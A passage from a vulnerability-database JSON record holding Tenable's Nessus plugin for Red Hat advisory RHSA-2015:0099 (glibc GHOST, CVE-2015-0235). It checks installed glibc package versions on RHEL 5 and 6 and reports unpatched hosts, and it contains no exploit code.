(rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-07-30T14:05:51"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "609406179779e5ce50180d1319f9b120d86e033bb10e58ffada9b7a7439e2f2d", "hashmap": [{"hash": "5f51513fe342d0d876d5e6133b2e7d91", "key": "sourceData"}, {"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "7c03779312ffcb90b2c1d0c697a916c4", "key": "modified"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "e010fd952706847a7e7ec9bd37c23380", "key": "cpe"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "2091fc8b5268a0c4b492e97e601c3a5f", "key": "references"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2018-09-01T23:54:23", "modified": "2018-07-26T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2015-0099.html", "https://www.redhat.com/security/data/cve/CVE-2015-0235.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/26 18:45:29\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2015-0099.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6\\.2|6\\.4|6\\.5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.2 / 6.4 / 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", 